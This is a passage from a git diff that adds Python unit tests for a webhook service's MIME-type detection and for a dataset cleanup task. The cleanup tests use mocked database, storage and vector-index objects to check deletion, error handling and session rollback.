+ assert result.value["file2"] == file + assert result.truncated is False + + class TestIntegrationScenarios: """Test realistic integration scenarios.""" diff --git a/api/tests/unit_tests/services/test_webhook_service.py b/api/tests/unit_tests/services/test_webhook_service.py index 6afe52d97b..d788657589 100644 --- a/api/tests/unit_tests/services/test_webhook_service.py +++ b/api/tests/unit_tests/services/test_webhook_service.py @@ -82,19 +82,19 @@ class TestWebhookServiceUnit: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" with patch.object(WebhookService, "_process_file_uploads") as mock_process_files: - mock_process_files.return_value = {"upload": "mocked_file_obj"} + mock_process_files.return_value = {"file": "mocked_file_obj"} webhook_data = WebhookService.extract_webhook_data(webhook_trigger) assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert webhook_data["files"]["upload"] == "mocked_file_obj" + assert webhook_data["files"]["file"] == "mocked_file_obj" mock_process_files.assert_called_once() def test_extract_webhook_data_raw_text(self): @@ -110,6 +110,70 @@ class TestWebhookServiceUnit: assert webhook_data["method"] == "POST" assert webhook_data["body"]["raw"] == "raw text content" + def test_extract_octet_stream_body_uses_detected_mime(self): + """Octet-stream uploads should rely on detected MIME type.""" + app = Flask(__name__) + binary_content = b"plain text data" + + with app.test_request_context( + "/webhook", method="POST", headers={"Content-Type": "application/octet-stream"}, data=binary_content + ): + webhook_trigger = MagicMock() + mock_file = MagicMock() + mock_file.to_dict.return_value = {"file": "data"} + + with ( + patch.object(WebhookService, "_detect_binary_mimetype", return_value="text/plain") as mock_detect, + patch.object(WebhookService, "_create_file_from_binary") as mock_create, + ): + mock_create.return_value = mock_file + body, files = WebhookService._extract_octet_stream_body(webhook_trigger) + + assert body["raw"] == {"file": "data"} + assert files == {} + mock_detect.assert_called_once_with(binary_content) + mock_create.assert_called_once() + args = mock_create.call_args[0] + assert args[0] == binary_content + assert args[1] == "text/plain" + assert args[2] is webhook_trigger + + def test_detect_binary_mimetype_uses_magic(self, monkeypatch): + """python-magic output should be used when available.""" + fake_magic = MagicMock() + fake_magic.from_buffer.return_value = "image/png" + monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic) + + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "image/png" + fake_magic.from_buffer.assert_called_once() + + def test_detect_binary_mimetype_fallback_without_magic(self, monkeypatch): + """Fallback MIME type should be used when python-magic is unavailable.""" + monkeypatch.setattr("services.trigger.webhook_service.magic", None) + + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "application/octet-stream" + + def test_detect_binary_mimetype_handles_magic_exception(self, monkeypatch): + """Fallback MIME type should be used when python-magic raises an exception.""" + try: + import magic as real_magic + except ImportError: + pytest.skip("python-magic is not installed") + + fake_magic = MagicMock() + fake_magic.from_buffer.side_effect = real_magic.MagicException("magic error") + monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic) + + with patch("services.trigger.webhook_service.logger") as mock_logger: + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "application/octet-stream" + mock_logger.debug.assert_called_once() + def test_extract_webhook_data_invalid_json(self): """Test webhook data extraction with invalid JSON.""" app = Flask(__name__) diff --git a/api/tests/unit_tests/tasks/test_clean_dataset_task.py b/api/tests/unit_tests/tasks/test_clean_dataset_task.py new file mode 100644 index 0000000000..bace66bec4 --- /dev/null +++ b/api/tests/unit_tests/tasks/test_clean_dataset_task.py @@ -0,0 +1,1232 @@ +""" +Unit tests for clean_dataset_task. + +This module tests the dataset cleanup task functionality including: +- Basic cleanup of documents and segments +- Vector database cleanup with IndexProcessorFactory +- Storage file deletion +- Invalid doc_form handling with default fallback +- Error handling and database session rollback +- Pipeline and workflow deletion +- Segment attachment cleanup +""" + +import uuid +from unittest.mock import MagicMock, patch + +import pytest + +from tasks.clean_dataset_task import clean_dataset_task + +# ============================================================================ +# Fixtures +# ============================================================================ + + +@pytest.fixture +def tenant_id(): + """Generate a unique tenant ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def dataset_id(): + """Generate a unique dataset ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def collection_binding_id(): + """Generate a unique collection binding ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def pipeline_id(): + """Generate a unique pipeline ID for testing.""" + return str(uuid.uuid4()) + + +@pytest.fixture +def mock_db_session(): + """Mock database session with query capabilities.""" + with patch("tasks.clean_dataset_task.db") as mock_db: + mock_session = MagicMock() + mock_db.session = mock_session + + # Setup query chain + mock_query = MagicMock() + mock_session.query.return_value = mock_query + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 0 + + # Setup scalars for select queries + mock_session.scalars.return_value.all.return_value = [] + + # Setup execute for JOIN queries + mock_session.execute.return_value.all.return_value = [] + + yield mock_db + + +@pytest.fixture +def mock_storage(): + """Mock storage client.""" + with patch("tasks.clean_dataset_task.storage") as mock_storage: + mock_storage.delete.return_value = None + yield mock_storage + + +@pytest.fixture +def mock_index_processor_factory(): + """Mock IndexProcessorFactory.""" + with patch("tasks.clean_dataset_task.IndexProcessorFactory") as mock_factory: + mock_processor = MagicMock() + mock_processor.clean.return_value = None + mock_factory_instance = MagicMock() + mock_factory_instance.init_index_processor.return_value = mock_processor + mock_factory.return_value = mock_factory_instance + + yield { + "factory": mock_factory, + "factory_instance": mock_factory_instance, + "processor": mock_processor, + } + + +@pytest.fixture +def mock_get_image_upload_file_ids(): + """Mock get_image_upload_file_ids function.""" + with patch("tasks.clean_dataset_task.get_image_upload_file_ids") as mock_func: + mock_func.return_value = [] + yield mock_func + + +@pytest.fixture +def mock_document(): + """Create a mock Document object.""" + doc = MagicMock() + doc.id = str(uuid.uuid4()) + doc.tenant_id = str(uuid.uuid4()) + doc.dataset_id = str(uuid.uuid4()) + doc.data_source_type = "upload_file" + doc.data_source_info = '{"upload_file_id": "test-file-id"}' + doc.data_source_info_dict = {"upload_file_id": "test-file-id"} + return doc + + +@pytest.fixture +def mock_segment(): + """Create a mock DocumentSegment object.""" + segment = MagicMock() + segment.id = str(uuid.uuid4()) + segment.content = "Test segment content" + return segment + + +@pytest.fixture +def mock_upload_file(): + """Create a mock UploadFile object.""" + upload_file = MagicMock() + upload_file.id = str(uuid.uuid4()) + upload_file.key = f"test_files/{uuid.uuid4()}.txt" + return upload_file + + +# ============================================================================ +# Test Basic Cleanup +# ============================================================================ + + +class TestBasicCleanup: + """Test cases for basic dataset cleanup functionality.""" + + def test_clean_dataset_task_empty_dataset( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test cleanup of an empty dataset with no documents or segments. + + Scenario: + - Dataset has no documents or segments + - Should still clean vector database and delete related records + + Expected behavior: + - IndexProcessorFactory is called to clean vector database + - No storage deletions occur + - Related records (DatasetProcessRule, etc.) are deleted + - Session is committed and closed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_index_processor_factory["factory"].assert_called_once_with("paragraph_index") + mock_index_processor_factory["processor"].clean.assert_called_once() + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + mock_db_session.session.close.assert_called_once() + + def test_clean_dataset_task_with_documents_and_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + mock_document, + mock_segment, + ): + """ + Test cleanup of dataset with documents and segments. + + Scenario: + - Dataset has one document and one segment + - No image files in segment content + + Expected behavior: + - Documents and segments are deleted + - Vector database is cleaned + - Session is committed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [mock_segment], # segments + ] + mock_get_image_upload_file_ids.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.delete.assert_any_call(mock_document) + mock_db_session.session.delete.assert_any_call(mock_segment) + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_deletes_related_records( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that all related records are deleted. + + Expected behavior: + - DatasetProcessRule records are deleted + - DatasetQuery records are deleted + - AppDatasetJoin records are deleted + - DatasetMetadata records are deleted + - DatasetMetadataBinding records are deleted + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - verify query.where.delete was called multiple times + # for different models (DatasetProcessRule, DatasetQuery, etc.) + assert mock_query.delete.call_count >= 5 + + +# ============================================================================ +# Test Doc Form Validation +# ============================================================================ + + +class TestDocFormValidation: + """Test cases for doc_form validation and default fallback.""" + + @pytest.mark.parametrize( + "invalid_doc_form", + [ + None, + "", + " ", + "\t", + "\n", + " \t\n ", + ], + ) + def test_clean_dataset_task_invalid_doc_form_uses_default( + self, + invalid_doc_form, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that invalid doc_form values use default paragraph index type. + + Scenario: + - doc_form is None, empty, or whitespace-only + - Should use default IndexStructureType.PARAGRAPH_INDEX + + Expected behavior: + - Default index type is used for cleanup + - No errors are raised + - Cleanup proceeds normally + """ + # Arrange - import to verify the default value + from core.rag.index_processor.constant.index_type import IndexStructureType + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form=invalid_doc_form, + ) + + # Assert - IndexProcessorFactory should be called with default type + mock_index_processor_factory["factory"].assert_called_once_with(IndexStructureType.PARAGRAPH_INDEX) + mock_index_processor_factory["processor"].clean.assert_called_once() + + def test_clean_dataset_task_valid_doc_form_used_directly( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that valid doc_form values are used directly. + + Expected behavior: + - Provided doc_form is passed to IndexProcessorFactory + """ + # Arrange + valid_doc_form = "qa_index" + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form=valid_doc_form, + ) + + # Assert + mock_index_processor_factory["factory"].assert_called_once_with(valid_doc_form) + + +# ============================================================================ +# Test Error Handling +# ============================================================================ + + +class TestErrorHandling: + """Test cases for error handling and recovery.""" + + def test_clean_dataset_task_vector_cleanup_failure_continues( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + mock_document, + mock_segment, + ): + """ + Test that document cleanup continues even if vector cleanup fails. + + Scenario: + - IndexProcessor.clean() raises an exception + - Document and segment deletion should still proceed + + Expected behavior: + - Exception is caught and logged + - Documents and segments are still deleted + - Session is committed + """ + # Arrange + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [mock_segment], # segments + ] + mock_index_processor_factory["processor"].clean.side_effect = Exception("Vector database error") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - documents and segments should still be deleted + mock_db_session.session.delete.assert_any_call(mock_document) + mock_db_session.session.delete.assert_any_call(mock_segment) + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_storage_delete_failure_continues( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that cleanup continues even if storage deletion fails. + + Scenario: + - Segment contains image file references + - Storage.delete() raises an exception + - Cleanup should continue + + Expected behavior: + - Exception is caught and logged + - Image file record is still deleted from database + - Other cleanup operations proceed + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type to avoid file deletion + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = "Test content with image" + + mock_upload_file = MagicMock() + mock_upload_file.id = str(uuid.uuid4()) + mock_upload_file.key = "images/test-image.jpg" + + image_file_id = mock_upload_file.id + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + mock_get_image_upload_file_ids.return_value = [image_file_id] + mock_db_session.session.query.return_value.where.return_value.first.return_value = mock_upload_file + mock_storage.delete.side_effect = Exception("Storage service unavailable") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete was attempted for image file + mock_storage.delete.assert_called_with(mock_upload_file.key) + # Image file should still be deleted from database + mock_db_session.session.delete.assert_any_call(mock_upload_file) + + def test_clean_dataset_task_database_error_rollback( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that database session is rolled back on error. + + Scenario: + - Database operation raises an exception + - Session should be rolled back to prevent dirty state + + Expected behavior: + - Session.rollback() is called + - Session.close() is called in finally block + """ + # Arrange + mock_db_session.session.commit.side_effect = Exception("Database commit failed") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.rollback.assert_called_once() + mock_db_session.session.close.assert_called_once() + + def test_clean_dataset_task_rollback_failure_still_closes_session( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that session is closed even if rollback fails. + + Scenario: + - Database commit fails + - Rollback also fails + - Session should still be closed + + Expected behavior: + - Session.close() is called regardless of rollback failure + """ + # Arrange + mock_db_session.session.commit.side_effect = Exception("Commit failed") + mock_db_session.session.rollback.side_effect = Exception("Rollback failed") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.close.assert_called_once() + + +# ============================================================================ +# Test Pipeline and Workflow Deletion +# ============================================================================ + + +class TestPipelineAndWorkflowDeletion: + """Test cases for pipeline and workflow deletion.""" + + def test_clean_dataset_task_with_pipeline_id( + self, + dataset_id, + tenant_id, + collection_binding_id, + pipeline_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that pipeline and workflow are deleted when pipeline_id is provided. + + Expected behavior: + - Pipeline record is deleted + - Related workflow record is deleted + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + pipeline_id=pipeline_id, + ) + + # Assert - verify delete was called for pipeline-related queries + # The actual count depends on total queries, but pipeline deletion should add 2 more + assert mock_query.delete.call_count >= 7 # 5 base + 2 pipeline/workflow + + def test_clean_dataset_task_without_pipeline_id( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that pipeline/workflow deletion is skipped when pipeline_id is None. + + Expected behavior: + - Pipeline and workflow deletion queries are not executed + """ + # Arrange + mock_query = mock_db_session.session.query.return_value + mock_query.where.return_value = mock_query + mock_query.delete.return_value = 1 + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + pipeline_id=None, + ) + + # Assert - verify delete was called only for base queries (5 times) + assert mock_query.delete.call_count == 5 + + +# ============================================================================ +# Test Segment Attachment Cleanup +# ============================================================================ + + +class TestSegmentAttachmentCleanup: + """Test cases for segment attachment cleanup.""" + + def test_clean_dataset_task_with_attachments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that segment attachments are cleaned up properly. + + Scenario: + - Dataset has segment attachments with associated files + - Both binding and file records should be deleted + + Expected behavior: + - Storage.delete() is called for each attachment file + - Attachment file records are deleted from database + - Binding records are deleted from database + """ + # Arrange + mock_binding = MagicMock() + mock_binding.attachment_id = str(uuid.uuid4()) + + mock_attachment_file = MagicMock() + mock_attachment_file.id = mock_binding.attachment_id + mock_attachment_file.key = f"attachments/{uuid.uuid4()}.pdf" + + # Setup execute to return attachment with binding + mock_db_session.session.execute.return_value.all.return_value = [(mock_binding, mock_attachment_file)] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_called_with(mock_attachment_file.key) + mock_db_session.session.delete.assert_any_call(mock_attachment_file) + mock_db_session.session.delete.assert_any_call(mock_binding) + + def test_clean_dataset_task_attachment_storage_failure( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that cleanup continues even if attachment storage deletion fails. + + Expected behavior: + - Exception is caught and logged + - Attachment file and binding are still deleted from database + """ + # Arrange + mock_binding = MagicMock() + mock_binding.attachment_id = str(uuid.uuid4()) + + mock_attachment_file = MagicMock() + mock_attachment_file.id = mock_binding.attachment_id + mock_attachment_file.key = f"attachments/{uuid.uuid4()}.pdf" + + mock_db_session.session.execute.return_value.all.return_value = [(mock_binding, mock_attachment_file)] + mock_storage.delete.side_effect = Exception("Storage error") + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete was attempted + mock_storage.delete.assert_called_once() + # Records should still be deleted from database + mock_db_session.session.delete.assert_any_call(mock_attachment_file) + mock_db_session.session.delete.assert_any_call(mock_binding) + + +# ============================================================================ +# Test Upload File Cleanup +# ============================================================================ + + +class TestUploadFileCleanup: + """Test cases for upload file cleanup.""" + + def test_clean_dataset_task_deletes_document_upload_files( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that document upload files are deleted. + + Scenario: + - Document has data_source_type = "upload_file" + - data_source_info contains upload_file_id + + Expected behavior: + - Upload file is deleted from storage + - Upload file record is deleted from database + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = '{"upload_file_id": "test-file-id"}' + mock_document.data_source_info_dict = {"upload_file_id": "test-file-id"} + + mock_upload_file = MagicMock() + mock_upload_file.id = "test-file-id" + mock_upload_file.key = "uploads/test-file.txt" + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + mock_db_session.session.query.return_value.where.return_value.first.return_value = mock_upload_file + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_called_with(mock_upload_file.key) + mock_db_session.session.delete.assert_any_call(mock_upload_file) + + def test_clean_dataset_task_handles_missing_upload_file( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that missing upload files are handled gracefully. + + Scenario: + - Document references an upload_file_id that doesn't exist + + Expected behavior: + - No error is raised + - Cleanup continues normally + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = '{"upload_file_id": "nonexistent-file"}' + mock_document.data_source_info_dict = {"upload_file_id": "nonexistent-file"} + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + mock_db_session.session.query.return_value.where.return_value.first.return_value = None + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_handles_non_upload_file_data_source( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that non-upload_file data sources are skipped. + + Scenario: + - Document has data_source_type = "website" + + Expected behavior: + - No file deletion is attempted + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" + mock_document.data_source_info = None + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - storage delete should not be called for document files + # (only for image files in segments, which are empty here) + mock_storage.delete.assert_not_called() + + +# ============================================================================ +# Test Image File Cleanup +# ============================================================================ + + +class TestImageFileCleanup: + """Test cases for image file cleanup in segments.""" + + def test_clean_dataset_task_deletes_image_files_in_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that image files referenced in segment content are deleted. + + Scenario: + - Segment content contains image file references + - get_image_upload_file_ids returns file IDs + + Expected behavior: + - Each image file is deleted from storage + - Each image file record is deleted from database + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = ' ' + + image_file_ids = ["image-1", "image-2"] + mock_get_image_upload_file_ids.return_value = image_file_ids + + mock_image_files = [] + for file_id in image_file_ids: + mock_file = MagicMock() + mock_file.id = file_id + mock_file.key = f"images/{file_id}.jpg" + mock_image_files.append(mock_file) + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + + # Setup a mock query chain that returns files in sequence + mock_query = MagicMock() + mock_where = MagicMock() + mock_query.where.return_value = mock_where + mock_where.first.side_effect = mock_image_files + mock_db_session.session.query.return_value = mock_query + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + assert mock_storage.delete.call_count == 2 + mock_storage.delete.assert_any_call("images/image-1.jpg") + mock_storage.delete.assert_any_call("images/image-2.jpg") + + def test_clean_dataset_task_handles_missing_image_file( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that missing image files are handled gracefully. + + Scenario: + - Segment references image file ID that doesn't exist in database + + Expected behavior: + - No error is raised + - Cleanup continues + """ + # Arrange + # Need at least one document for segment processing to occur (code is in else block) + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "website" # Non-upload type + + mock_segment = MagicMock() + mock_segment.id = str(uuid.uuid4()) + mock_segment.content = '' + + mock_get_image_upload_file_ids.return_value = ["nonexistent-image"] + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents - need at least one for segment processing + [mock_segment], # segments + ] + + # Image file not found + mock_db_session.session.query.return_value.where.return_value.first.return_value = None + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + +# ============================================================================ +# Test Edge Cases +# ============================================================================ + + +class TestEdgeCases: + """Test edge cases and boundary conditions.""" + + def test_clean_dataset_task_multiple_documents_and_segments( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test cleanup of multiple documents and segments. + + Scenario: + - Dataset has 5 documents and 10 segments + + Expected behavior: + - All documents and segments are deleted + """ + # Arrange + mock_documents = [] + for i in range(5): + doc = MagicMock() + doc.id = str(uuid.uuid4()) + doc.tenant_id = tenant_id + doc.data_source_type = "website" # Non-upload type + mock_documents.append(doc) + + mock_segments = [] + for i in range(10): + seg = MagicMock() + seg.id = str(uuid.uuid4()) + seg.content = f"Segment content {i}" + mock_segments.append(seg) + + mock_db_session.session.scalars.return_value.all.side_effect = [ + mock_documents, + mock_segments, + ] + mock_get_image_upload_file_ids.return_value = [] + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert - all documents and segments should be deleted + delete_calls = mock_db_session.session.delete.call_args_list + deleted_items = [call[0][0] for call in delete_calls] + + for doc in mock_documents: + assert doc in deleted_items + for seg in mock_segments: + assert seg in deleted_items + + def test_clean_dataset_task_document_with_empty_data_source_info( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test handling of document with empty data_source_info. + + Scenario: + - Document has data_source_type = "upload_file" + - data_source_info is None or empty + + Expected behavior: + - No error is raised + - File deletion is skipped + """ + # Arrange + mock_document = MagicMock() + mock_document.id = str(uuid.uuid4()) + mock_document.tenant_id = tenant_id + mock_document.data_source_type = "upload_file" + mock_document.data_source_info = None + + mock_db_session.session.scalars.return_value.all.side_effect = [ + [mock_document], # documents + [], # segments + ] + + # Act - should not raise exception + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_storage.delete.assert_not_called() + mock_db_session.session.commit.assert_called_once() + + def test_clean_dataset_task_session_always_closed( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that database session is always closed regardless of success or failure. + + Expected behavior: + - Session.close() is called in finally block + """ + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique="high_quality", + index_struct='{"type": "paragraph"}', + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_db_session.session.close.assert_called_once() + + +# ============================================================================ +# Test IndexProcessor Parameters +# ============================================================================ + + +class TestIndexProcessorParameters: + """Test cases for IndexProcessor clean method parameters.""" + + def test_clean_dataset_task_passes_correct_parameters_to_index_processor( + self, + dataset_id, + tenant_id, + collection_binding_id, + mock_db_session, + mock_storage, + mock_index_processor_factory, + mock_get_image_upload_file_ids, + ): + """ + Test that correct parameters are passed to IndexProcessor.clean(). + + Expected behavior: + - with_keywords=True is passed + - delete_child_chunks=True is passed + - Dataset object with correct attributes is passed + """ + # Arrange + indexing_technique = "high_quality" + index_struct = '{"type": "paragraph"}' + + # Act + clean_dataset_task( + dataset_id=dataset_id, + tenant_id=tenant_id, + indexing_technique=indexing_technique, + index_struct=index_struct, + collection_binding_id=collection_binding_id, + doc_form="paragraph_index", + ) + + # Assert + mock_index_processor_factory["processor"].clean.assert_called_once() + call_args = mock_index_processor_factory["processor"].clean.call_args + + # Verify positional arguments + dataset_arg = call_args[0][0] + assert dataset_arg.id == dataset_id + assert dataset_arg.tenant_id == tenant_id + assert dataset_arg.indexing_technique == indexing_technique + assert dataset_arg.index_struct == index_struct + assert dataset_arg.collection_binding_id == collection_binding_id + + # Verify None is passed as second argument + assert 